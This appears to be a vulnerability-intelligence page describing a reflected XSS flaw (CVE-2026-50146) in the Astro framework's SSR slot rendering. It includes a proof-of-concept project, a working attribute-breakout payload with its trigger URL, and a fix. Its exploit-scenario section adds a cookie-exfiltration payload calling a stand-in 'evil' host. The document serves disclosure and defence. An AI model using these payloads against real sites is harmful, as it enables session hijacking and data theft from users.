Astro CVE-2026-50146
HIGH
GHSA-8hv8-536x-4wqp
Severity by source
AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N
Reflected XSS reachable over the network without auth but needs victim click (UI:R); injected script in app origin yields scope change with limited C/I impact and no availability effect.
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N
Lifecycle Timeline
2Blast Radius
ecosystem impact- 1 npm packages depend on astro (1 direct, 0 indirect)
Ecosystem-wide dependent count for version 6.3.3.
DescriptionGitHub Advisory
Summary
When a component uses a client:* directive, Astro inserts named slot content into a data-astro-template attribute without HTML escaping the slot name allowing an attacker to break out of the attribute context and inject arbitrary HTML, resulting in reflected XSS during SSR.
This is similar to GHSA-wrwg-2hg8-v723 but exploits a different injection point.
Vulnerable Code
packages/astro/src/runtime/server/render/component.ts:371:376
// component.ts:371
`<template data-astro-template${key !== 'default' ? `="${key}"` : ''}>${children[key]}</template>`I found that key is interpolated directly into the attribute value without proper escaping.
Proof of Concept
For the PoC, I set up with a minimal repository with Astro 6.3.1, Node.js: v26.0.0.
astro.config.mjs
import react from '@astrojs/react';
import node from '@astrojs/node';
import { defineConfig } from 'astro/config';
export default defineConfig({
output: 'server',
adapter: node({ mode: 'standalone' }),
integrations: [react()],
});src/pages/index.astro
---
import Wrapper from '../components/Wrapper.jsx';
const slotName = Astro.url.searchParams.get('tab') ?? 'default';
---
<html><body>
<Wrapper client:load>
<div slot={slotName}>content</div>
</Wrapper>
</body></html>src/components/Wrapper.jsx
export default function Wrapper() { return null; }Payload:
abc"></template></astro-island><img src=x onerror=confirm(document.domain)><!--Accessing this URL will trigger the popup.
http://localhost:4321/?tab=abc%22%3E%3C%2Ftemplate%3E%3C%2Fastro-island%3E%3Cimg+src%3Dx+onerror%3Dconfirm(document.domain)%3E%3C!--
<img width="1268" height="592" alt="image" src="https://github.com/user-attachments/assets/675cdc04-4134-4d83-883c-abe16d751ec7" />
This will render in html.
<template data-astro-template="abc"></template></astro-island>
<img src=x onerror=confirm(document.domain)><!--">content</template>Fix
I suggest leveraging the existing escape function on the slot name.
// component.ts:371
`<template data-astro-template${key !== 'default' ? `="${escapeHTML(String(key))}"` : ''}>${children[key]}</template>`---
Articles & Coverage 1
AnalysisAI
Reflected cross-site scripting in Astro framework (versions prior to 6.3.3) allows remote attackers to inject arbitrary HTML and execute JavaScript in victim browsers when an SSR-rendered page passes user-controlled input as a slot name to a component using a client:* directive. The flaw lives in the server renderer, which interpolates the slot name into a data-astro-template attribute without HTML escaping, enabling attribute-context breakout. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires all of the following: the target Astro application runs in SSR mode (output: 'server' with a server adapter such as @astrojs/node), it renders a component using a client:* directive (e.g. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The provided CVSS 3.1 vector AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N (7.1 High) is consistent with a reflected XSS triggered by a victim visiting a crafted URL: network reachable, low complexity, no authentication, user interaction required. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker crafts a URL to an Astro SSR application that maps a query parameter into a slot name, e.g. /?tab=abc"></template></astro-island><img src=x onerror=fetch('https://evil/?c='+document.cookie)><!--, and lures a logged-in victim to click it via phishing or a malicious link. … |
| Remediation | Upgrade the astro npm package to version 6.3.3 or later, which adds HTML escaping of the slot name in packages/astro/src/runtime/server/render/component.ts as described in the GHSA-8hv8-536x-4wqp advisory (https://github.com/withastro/astro/security/advisories/GHSA-8hv8-536x-4wqp). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Identify all web applications running Astro versions prior to 6.3.3 and assess their exposure to user-controlled input in component slots. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
More from same product – last 7 days
Denial of service in the image-size Node.js library through version 2.0.2 allows remote unauthenticated attackers to per
Denial of service in the image-size Node.js library (versions up to and including 2.0.2) allows remote unauthenticated a
Remote code execution in Vitest Browser Mode (npm @vitest/browser 3.0.0-3.2.4, 4.0.0-4.1.7, 5.0.0-beta.0-5.0.0-beta.3) a
Remote prototype pollution in i18next-http-middleware before 3.9.7 allows unauthenticated attackers to write to Object.p
Prototype pollution in ApostropheCMS versions up to and including 4.30.0 allows an authenticated editor to poison Object
Share
External POC / Exploit Code
Leaving vuln.today